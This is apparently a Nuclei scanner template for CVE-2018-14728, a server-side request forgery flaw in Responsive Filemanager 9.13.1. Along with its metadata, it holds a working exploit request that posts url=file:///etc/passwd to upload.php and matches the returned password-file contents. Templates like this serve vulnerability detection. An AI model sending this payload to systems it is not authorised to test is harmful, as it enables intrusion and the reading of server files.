41 lines
1.6 KiB
YAML
41 lines
1.6 KiB
YAML
id: CVE-2018-14728
|
|
|
|
info:
|
|
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
|
|
author: madrobot
|
|
severity: critical
|
|
description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
|
|
remediation: |
|
|
Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
|
|
- https://www.exploit-db.com/exploits/45103/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-14728
|
|
cwe-id: CWE-918
|
|
epss-score: 0.96381
|
|
epss-percentile: 0.9944
|
|
cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: tecrail
|
|
product: responsive_filemanager
|
|
tags: cve,cve2018,ssrf,lfi,packetstorm,edb,intrusive,tecrail
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/filemanager/upload.php"
|
|
|
|
body: fldr=&url=file:///etc/passwd
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
# digest: 490a00463044022014ff41efa0fa46b999efc7034d1de4b1d83688c6a8d4625f3fb73937ccc37dcb02205de22757069bbe19e3f8bb95c3157aca4b616feafff7108e867a0a7f467cc410:922c64590222798bb761d5b6d8e72950 |